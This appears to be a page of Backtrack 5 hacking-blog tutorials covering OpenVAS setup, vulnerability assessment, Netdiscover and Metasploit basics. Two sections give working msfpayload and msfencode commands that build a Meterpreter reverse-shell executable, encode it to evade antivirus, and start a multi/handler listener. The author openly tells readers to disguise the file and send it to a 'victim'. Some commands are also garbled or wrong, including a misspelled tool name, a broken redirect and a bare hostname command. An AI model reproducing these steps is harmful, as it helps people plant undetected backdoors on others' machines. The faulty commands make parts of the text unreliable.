How to configure OpenVAS

OpenVAS is the most advanced open source vulnerability scanner and manager tool. It already comes pre-installed in Backtrack 5. Today i will show you how to configure this wonderful tool.

Here is the location fo OpenVAS:

Setting up OpenVAS

1- Adding a user:

Just follow the graphical menu as shown above and click on "adduser" and follow the instructions.

Easy configuration as you see :-)

2- Making the certificate:  From the same menu click on  Openvas mkcert and follow instructions.

3- Syncing the NVT's: In this step we are going to update the OpenVAS repository to get the latest tools and plugins used to identify vulnerabilities. If you want to be up to date, do this regularly. 

So select OpenVAS NVT Sync from the menu:

4- Starting the scanner: Again, from the same graphical menu, click on "start OpenVAS scanner"

5- Setup OpenVAS manager: We need here to generate a certificate for OpenVAS manager by running the following command:


root@shinobi:~# openvas-mkcert-client -n om -i

Now we need to rebuild the database and you should do this each time you update the NVT's. This is done with a simple command:


root@shinobi:~# openvasmd --rebuild

6- Setup OpenVAS Administrator:

We need to create an administrative user that we will be using to perform all of our vulnerability assesments. This is done by running the following command:


root@shinobi:~# openvasad -c 'add_user' -n openvasadmin -r Admin

Note that you can replace "openvasadmin" by any other username of your choice.

Now we need to start Openvas Administrator.

This also runs as a daemon in the background. As I am running everything from my local machine I will be using localhost to listen on and in this case the default port. This is done by running the following command.

root@shinobi:~#openvasad -a 127.0.0.1 -p 9393

Starting Greenbone Security Assistant:

Now we need to start Greenbone security Assistant

This again runs as a daemon in the background. As I am running everything from my local machine I will be using localhost to listen on and in this case the default port. This is done by running the following command.

root@shinobi:~# gsad --http-only --listen=127.0.0.1 -p 9392

At this point your installation is essentially complete, but as we have got this far we may as well continue to make sure everything is working as expected.

We need now to start an application to enable you to communicate with the scanner and other daemons.

The first of these choices is greenbone security desktop.

Start this from the menu item and fill in the credentials and details we created earlier, then click the login button.

Read more

Vulnerability assessement

Vulnerability assessment is the second phase of penetration testing. After you have gained the initial information and a main layout of your target during the information gathering phase, you can now scan the target for possible vulnerabilities for future exploits. The aim of this important step is simply to find potential security leaks that allow a user to gain an unauthorized access to a given system. Backtrack 5 comes with vulnerability scanner tools; that i am going to cover in detail in future articles; but there are also online tools that you can also use.
In Backtrack the vulnerability Assessment category is subdivided into: 

1-Vulnerability scanners: the most famous ones are OpenVAS & Nessus. You also have lynis and mantra.


2-Network Assessment: It includes CISCO tools, Network fuzzers, Open Source Assessment and VOIP Fuzzers.

3-Web Application Assessment

4-Database Assessment

                                 vulnerability assessment in action

Vulnerability Analysis is  a passive process in which you use tools or utilities, sometimes software to analyze network traffic and systems to identify any security flaws or mis-configuration that increase vulnerability to attacks. You can consider it as an advanced stage of information gathering or foot-printing.
The active phase of penetration testing is Exploitation.
Assessment can have both sides: defensive or offensive. It can be used to discover any security breaches to later find the adequate solutions to fix them; and this what a penetration tester is expected to do; or it can also be used with  malicious intentions to exploit  available vulnerabilities to gain an unauthorized access to a system.

Read more

FUD backdoor with msfencode

In the previous article, we have seen how to create a simple backdoor.exe for exploiting windows machines simple backdoor. However that simple backdoor is easily caught by any antivirus program, you can't rely after all on a stupid victim who is not running an antivirus program on his machine, because you know that it is very rare. 
Well, metasploit has the necessary tools for crypting your backdoor to avoid detection. Let's see first our chances to bypass an antivirus program without encryption:

Here is another scan:

As you can see, we have a little chance to have a successful exploitation of a remote victim.


Let's see what available options does metasploit offer to us:

root@shinobi:~# msfencode -h

Let's see what available encoders do we have: 

root@shinobi:~# msfenode -l

As you may notice, the "shikata_ga_nai" is referred to as the best encoder in "msfencode",we are going to use it to encode our backdoor.

Let's create our backdoor:

root@shinobi:~# msfpayload windows/meterpreter_reverse_tcp LHOST=192.168.1.101 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw -a x86 -b '\x00\x0a\x0d' -c 5  -x /root/Desktop/pw.exe -o /root/Desktop/pwn.exe

With the above command, we enoded our backdoor 5 times with the "shikata_ga_nai" encoder and we exluded any recurrence of this code from our backdoor signature (\x00\x0a\x0d), then we exported the generated exe file to our desktop. Let's our chances now of fooling a given victim with online virus scanners..

As you can see !!!! the backdoor is totally FUD (fully undetected) !!!!

Read more

Creating a simple exe backdoor

In this scenario, we are going to create a simple backdoor which is an infected executable file to be run on a windows system. You need to provide your IP address which can be obtained by the command "ifconfig" together with the port you want your  backdoor to connect to. The custom port for this connection is usually 443 or 4444, but you can choose any other port.


issue the following command:



root@shinobi:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.15 LPORT=4444 > root/Desktop > backdoor.exe

So, as you can see from this example, a backdoor.exe has been created in the "Home" folder. In the above example just change the ip address with yours,, and name it to whatever you like, you don't like after all to tell your victim that this is a backdoor !! :-)

Now, we have finished with the first part, but what is next? 
We simply need a listener which will handle the connection back to our exploit machine.

First of all, we need to open metasploit console:


root@shinobi:~#msfconsole

Now ,we need to use multihandler for a reverse connection:

msf >  use exploit/multi/handler

Now , we set up our payload:

msf >  set payload windows/meterpreter/reverse_tcp

Now, we have to set up the lhost & lport:

msf >  set lhost 192.168.1.15

msf >  set lport 4444

Last phase now, is to type "exploit" 


msf > exploit

We are ready for exploiting the remote machine. Send the backdoor to a victim and wait for a connection ;-)


Read more

How to change your hostname

After we have seen how to customize your terminal background, here is another tutorial for customizing your username or hostname. In this example i' am going to change the Backtrack default hostname to my cyber name.

To display your current hostname type this command:

root@bt:~# hostname 

Now, to change the default hostname, type the following:

root@bt:~# shinobi

Let's see if it worked, so we need to close the terminal & open a new one:

However, if you reboot the system, this change will be lost. To fix that and make your new hostname permanent, we need to edit the "hostname" file in "etc":

root@bt:~# pico /etc/hostname

All what is left now is to change the default hostname to the one you have just chosen, then press Ctrl+O and press "enter"to save the changes, then Ctrl+x to exit.

Hope you like it :-)

Read more

The best penetration courses ever created !!!

"NINJA SECURITY is a leading provider of IT security and penetration testing courses for IT professionals. NINJA SECURITY mission is to advance the career of IT security professionals by providing affordable and comprehensive education. All NINJA SECURITY courses utilize engaging eLearning and the most effective mix of theory, practice and methodology in IT security all with real-world lessons that students can immediately apply to build relevant skills and keep their organization's data and systems safe". ninja security

The NINJA SECURITY team has just updated the website together with cutting edge new techniques & revolutionary courses.  I dare say on my own responsibility that the provided courses are far ahead from other rivals. If you have ever opted for another pentesting courses you must already noticed that they are riddles more than real useful courses, and they are always hiding things from learners just to keep them for themselves. With ninja security courses, you will have a big relief from the start. The courses are not electic, they teach you everything from scratch, explain missing theories and give you the opportunity to test every aquired skill and never let you down before making sure that you mastered your training before going further. You will also have all updates for free both slides and HD videos.
 The team is led by ANTITRUST, a geek pentester  with over than 10 Years experience in whitebox, blackbox Penetration Testing, and vulnerability research.

The courses include: Metasploit to the MAX, Penetration Testing and Software Exploitation (windows & Linux).

The Ninja Security Team, is intrested in programming, malware analysis, ethical Hacking, and penetration testing. If you are interested in joining the Ninja Security team do not hesitate to contact: contact

Read more

Netdiscover

"Netdiscover" is an active/passive address reconnaissance tool, mainly developed for those wireless networks without dhcp server, when you are wardriving. It can be also used on hub/switched networks.

Built on top of libnet and libpcap, it can passively detect online hosts, or search for them, by actively sending arp requests, it can also be used to inspect your network arp traffic, or find network addresses using auto scan mode, which will scan for common local networks." source: netdiscover

Here are the different available options of this tool:

In this example, i am going to use "netdiscover" to search for available hosts on my wireless interface:

You can input the interface of your choice, if you are cable connected for example, your internet interface should be eth0. To see what available network interfaces you have, opên a terminal and type: ifconfig

Read more

Introduction to METASPLOIT

What is metasploit?



Metasploit as described by its developers is :"A collaboration between the open source community and Rapid7, Metasploit software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments, providing true security risk intelligence. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports.

Metasploit editions range from a free edition to professional enterprise editions, all based on the Metasploit Framework, an open source software development kit with the world's largest, public collection of quality-assured exploits." http://www.metasploit.com/about/what-is-it/

There are many Metasploit editions: metasploit community, metasploit express, metasploit pro & metasploit framework. There are also different interfaces for this tool: msfconsole:

msfcli:

 and msf gui which is the graphiical interface:

You have to know also that there is no perfect interface for metasploit, each one has its pros & cons.

Architecture:

image credit to: HD Moore

Terminology:

1. Exploits: exploits are security flaw that allow a pentester to  attack targets.

2. Payloads: Allow attacker to generate shellcodes, executable files, and simply         specify the work of the payload.

3. Auxiliaries: integrated applications like sniffers, keyloggers ..

4. Meterpreter: An injected payload into a system process.

5. Encoders: Used to allow the modification of original exploit codes so that to shun antivirus detection software.

Basic commands:

1. Help: Displays all the metasploit commands:

2. Search: You can use if you are  not sure about the exact name of a certain exploit. If you want to look for an "smb" exploit for example you type: search smb:

3. use: Used to select a particular exploit:

4. info: Used to provide information about the selected exploit:

5. show options: Used to show all options of a given exploit:

6. show: Used to display all the available payloads, encoders, and nops arelated to a given exploit:

7. set: Used to configure a given exploit:

I hope that this article was useful to you.

Read more